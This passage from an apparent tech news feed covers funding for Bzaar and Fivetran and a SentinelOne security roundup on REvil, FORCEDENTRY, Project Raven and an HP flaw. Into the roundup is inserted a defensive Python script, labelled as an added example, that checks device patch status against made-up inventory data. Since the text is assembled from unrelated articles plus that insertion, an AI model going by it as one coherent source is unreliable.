“Airwallex has a clear competitive advantage in the digital payments market,” said David Craver, MD at Lone Pine Capital, in a statement. “Its unique Asia-Pacific roots, coupled with its innovative infrastructure, products and services, speak volumes about the business’ global growth opportunities and its impressive expansion in the competitive payment providers space. We are excited to invest in Airwallex at this dynamic time, and look forward to helping drive the company’s expansion and success worldwide.”

Updated to note that the coffee business was in Australia, not Hong Kong.

Bzaar bags $4M to enable US retailers to source home, lifestyle products from India

Small businesses in the U.S. now have a new way to source home and lifestyle goods from new manufacturers. Bzaar, a business-to-business cross-border marketplace, is connecting retailers with over 50 export-ready manufacturers in India.

The U.S.-based company announced Monday that it raised $4 million in seed funding, led by Canaan Partners, and including angel investors Flipkart co-founder Binny Bansal, PhonePe founders Sameer Nigam and Rahul Chari, Addition founder Lee Fixel and Helion Ventures co-founder Ashish Gupta.

Nishant Verman and Prasanth Nair co-founded Bzaar in 2020 and consider their company to be like a “fair without borders,” as Verman put it. Prior to founding Bzaar, Verman was at Bangalore-based Flipkart until it was acquired by Walmart in 2018. He then was at Canaan Partners in the U.S.

“We think the next 10 years of global trade will be different from the last 100 years,” he added. “That’s why we think this business needs to exist.”

Traditionally, small U.S. buyers did not have feet on the ground in manufacturing hubs, like China, to manage shipments of goods in the same way that large retailers did. Then Alibaba came along in the late 1990s and began acting as a gatekeeper for cross-border purchases, Verman said. U.S. goods imports from China totaled $451.7 billion in 2019, while U.S. goods imports from India in 2019 were $87.4 billion.

Bzaar screenshot. Image Credits: Bzaar

Small buyers could buy home and lifestyle goods, but it was typically through the same sellers, and there was not often a unique selection, nor were handmade goods or goods made from organic materials readily available, he added.

With Bzaar, small buyers can purchase over 10,000 wholesale goods on its marketplace from India and Southeast Asia. The company guarantees that products arrive within two weeks and manages all of the packaging logistics and buyer protection.

Verman and Nair launched the marketplace in April and had thousands of users on three continents purchasing from the platform within six months. Meanwhile, products on Bzaar are up to 50% cheaper than on domestic U.S. platforms, while SKU selection is doubling every month, Verman said.

The new funding will enable the company to invest in marketing to get in front of buyers and in its technology, advancing its cataloging feature so that goods pass through customs seamlessly. Wanting to provide new features for its small business customers, Verman also intends to create a credit feature to enable buyers to pay in installments or up to 90 days later.

“We feel this is a once-in-a-lifetime shift in how global trade works,” he added. “You need the right team in place to do this because the problem is quite complex to take products from a small town in Vietnam to Nashville. With our infrastructure in place, the good news is there are already shops and buyers, and we are stitching them together to give buyers a seamless experience.”


Fivetran hauls in $565M on $5.6B valuation, acquires competitor HVR for $700M

Fivetran, the data connectivity startup, had a big day today. For starters it announced a $565 million investment on a $5.6 billion valuation, but it didn’t stop there. It also announced its second acquisition this year, snagging HVR, a data integration competitor that had raised more than $50 million, for $700 million in cash and stock.

The company last raised a $100 million Series C on a $1.2 billion valuation, so the new round more than quadruples its valuation. As with that Series C, Andreessen Horowitz was back leading the round, with participation from other double dippers General Catalyst, CEAS Investments, Matrix Partners and other unnamed firms or individuals. New investors ICONIQ Capital, D1 Capital Partners and YC Continuity also came along for the ride. The company reports it has now raised $730 million.

The HVR acquisition represents a hefty investment for the startup, since it is buying a company for a price almost equal to all the money it has raised to date, but it provides a way to expand its market quickly by absorbing a competitor. Earlier this year Fivetran acquired Teleport Data as it continues to add functionality and customers via acquisition.

“The acquisition — a cash and stock deal valued at $700 million — strengthens Fivetran’s market position as one of the data integration leaders for all industries and all customer types,” the company said in a statement.

While that may smack of corporate marketing-speak, there is some truth to it: pulling data from multiple sources, sometimes from siloed legacy systems, is a huge challenge for companies, and both Fivetran and HVR have developed tools that provide the pipes to connect various data sources and put the data to work across a business.

Data is central to a number of modern enterprise practices, including customer experience management, which uses customer data to deliver customized experiences based on what a company knows about its customers, and it is the main fuel for machine learning models, which use it to understand and learn how a process works. Fivetran and HVR provide the nuts-and-bolts infrastructure to move data to where it is needed, connecting to applications like Salesforce, Box or Airtable, databases like PostgreSQL, or data repositories like Snowflake or Databricks.

Whether bigger is better remains to be seen, but Fivetran is betting that it will be in this case as it makes its way along the startup journey. The transaction has been approved by both companies’ boards. The deal is still subject to standard regulatory approval, but Fivetran is expecting it to close in October.

The Good, the Bad and the Ugly in Cybersecurity – Week 38

The Good

A few new developments occurred this week in the saga that is REvil ransomware. First off, REvil appears to have reactivated its infrastructure and has renewed its attacks, so far on a slightly smaller scale. New victims are appearing on its blog, and affiliates have resurfaced in specific underground forums in an effort to save some face and assure the world that they are kind and gentle cybercriminals.

However, the good news is that this week we also saw the release of a “master decrypter” for previous REvil victims.

The decrypter was the fruit of a joint collaboration between Bitdefender and “trusted law enforcement partners”. While it won’t help victims of the latest wave of REvil attacks, it does provide a simple and effective way for those who were hit before REvil’s recent hiatus, which followed the Kaseya and other high-profile attacks, to recover previously encrypted assets. As a reminder, SentinelOne Singularity will prevent REvil ransomware attacks as well as the associated TTPs.

The Bad

This was a particularly colorful week with regard to Apple and its emergency patch for a set of security vulnerabilities that enabled the deployment and use of NSO Group spyware. At the heart of these matters is an exploit dubbed FORCEDENTRY, which takes advantage of a vulnerability in Apple’s CoreGraphics framework.

What makes FORCEDENTRY so worrisome for users is that it does not require any user interaction to exploit, and since CoreGraphics is common to all Apple’s OS platforms, it can be leveraged against Apple’s iOS, iPadOS, watchOS, and macOS devices. Needless to say, the potentially exposed population is quite large and diverse. The flaw was originally reported by the Citizen Lab, who discovered it during an investigation into an iOS device belonging to a Saudi activist. The device had been infected by the NSO Group’s Pegasus spyware.

The bug was assigned CVE-2021-30860, and an emergency patch was released on September 13, 2021. It is believed that this flaw has been actively used against high-profile targets in the activist world since as early as June 2020. Specially crafted PDF documents can be used to deliver the exploit to targets, and it is simply the act of receiving the PDF that leads to the infection. A truly scary zero-click exploit.

Apple has released updates to address this and other issues. However, users of older systems should be aware: on the Mac, only Catalina and Big Sur have been patched for this vulnerability, so the almost 20% of Mac users still running macOS Mojave and earlier are out of luck. iPhone users require iOS 14.8 or later to receive the fix, while watchOS needs to be running 7.6.2 or higher.
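The version thresholds above are the kind of thing a defender turns into an inventory check. The following is an added example, not code from the article or from SentinelOne: it classifies devices against the fixed versions the article states (iOS 14.8, watchOS 7.6.2, and macOS Catalina/Big Sur as the only releases that received a patch). The iPadOS threshold, the hostnames and every version string in the sample inventory are constructed assumptions; the article gives no macOS build number, so for Macs the check can only say whether a fix exists for that release, not whether it has been installed.

```python
"""Flag Apple devices in an inventory that are not confirmed patched for
CVE-2021-30860 (FORCEDENTRY). Added example; not code from the article.
Thresholds are the ones the article states; inventory data is constructed."""
import re
from typing import Dict, List, Tuple

# Minimum versions carrying the fix, as stated in the article.
MIN_FIXED: Dict[str, Tuple[int, ...]] = {
    "iOS": (14, 8),
    "iPadOS": (14, 8),  # assumption: iPadOS follows the iOS version track
    "watchOS": (7, 6, 2),
}
# Only these Mac releases received the patch. The article gives no build
# number, so for macOS we can only report whether a fix exists at all.
PATCHED_MACOS_RELEASES = {"Catalina", "Big Sur"}


def parse_version(text: str) -> Tuple[int, ...]:
    """Turn '14.8' into (14, 8) so each component compares numerically.
    A plain string compare would wrongly rank '14.10' below '14.8'."""
    text = text.strip()
    if not re.fullmatch(r"\d+(\.\d+)*", text):
        # Reject junk rather than silently treating the device as patched.
        raise ValueError(f"unparseable version: {text!r}")
    return tuple(int(part) for part in text.split("."))


def fix_status(platform: str, version: str) -> str:
    """Return 'patched', 'unpatched', 'update_eligible' or 'no_fix_available'."""
    if platform == "macOS":
        if version in PATCHED_MACOS_RELEASES:
            return "update_eligible"  # a fix exists; installation is not confirmed
        return "no_fix_available"     # Mojave and earlier were not patched
    if platform not in MIN_FIXED:
        raise ValueError(f"unknown platform: {platform!r}")
    # Tuple comparison is lexicographic: (7, 6) < (7, 6, 2) and (14, 10) > (14, 8).
    if parse_version(version) >= MIN_FIXED[platform]:
        return "patched"
    return "unpatched"


# Constructed sample inventory: hostnames and versions are made up, and
# "14.10" is included only to exercise the numeric comparison.
SAMPLE_INVENTORY: List[Dict[str, str]] = [
    {"host": "phone-01", "platform": "iOS", "version": "14.8"},
    {"host": "phone-02", "platform": "iOS", "version": "14.7.1"},
    {"host": "phone-03", "platform": "iOS", "version": "14.10"},
    {"host": "watch-01", "platform": "watchOS", "version": "7.6"},
    {"host": "mac-01", "platform": "macOS", "version": "Mojave"},
    {"host": "mac-02", "platform": "macOS", "version": "Big Sur"},
]


def needs_attention(inventory: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (host, status) for every device that is not confirmed patched."""
    flagged: List[Tuple[str, str]] = []
    for device in inventory:
        status = fix_status(device["platform"], device["version"])
        if status != "patched":
            flagged.append((device["host"], status))
    return flagged


if __name__ == "__main__":
    for host, status in needs_attention(SAMPLE_INVENTORY):
        print(f"{host}: {status}")
```

The two details worth keeping when adapting this to a real MDM export are the numeric component-wise comparison (so a hypothetical 14.10 is not ranked below 14.8) and the refusal to parse malformed version strings, since an inventory row that cannot be read should surface as an error rather than disappear from the unpatched list.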

The Ugly

This week, three agents tied to “Project Raven” admitted to working against the United States government at the direction of the United Arab Emirates.

Under a deal designed to avoid prosecution, the three operatives admitted to working as spies for the U.A.E. and to violating U.S. laws, including by selling military secrets and technology. As part of “Project Raven”, the individuals were responsible for multiple intrusions into networks within the borders of the United States. In addition, they obtained and exported “sophisticated cyber intrusion tools” without the required license. These individuals were all considered lone “mercenaries” or “hackers-for-hire”.

While the full outcome is yet to be determined, the deal they struck appears to require the agents to pay a sum of $1.69 million and to relinquish all security clearance privileges in the United States.

On another note, this week SentinelLabs disclosed details of CVE-2021-3437, an escalation-of-privilege and denial-of-service vulnerability in the HP OMEN Gaming Hub on HP OMEN PCs. This high-severity flaw affects millions of HP devices and can be exploited to achieve kernel-level privileges, potentially offering full control of the targeted host. While gaming PCs aren’t usually found on the enterprise network, a vulnerable device in the home can pose just as much risk to work now that so many of us connect our company devices to our home networks.
